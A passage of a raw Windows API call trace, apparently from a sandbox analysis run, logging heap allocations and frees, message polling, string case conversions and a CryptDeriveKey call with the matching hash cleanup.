(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9f78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.818] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.819] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.823] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.824] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.826] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.826] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.826] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.826] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.826] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.827] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.827] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.827] RtlAllocateHeap 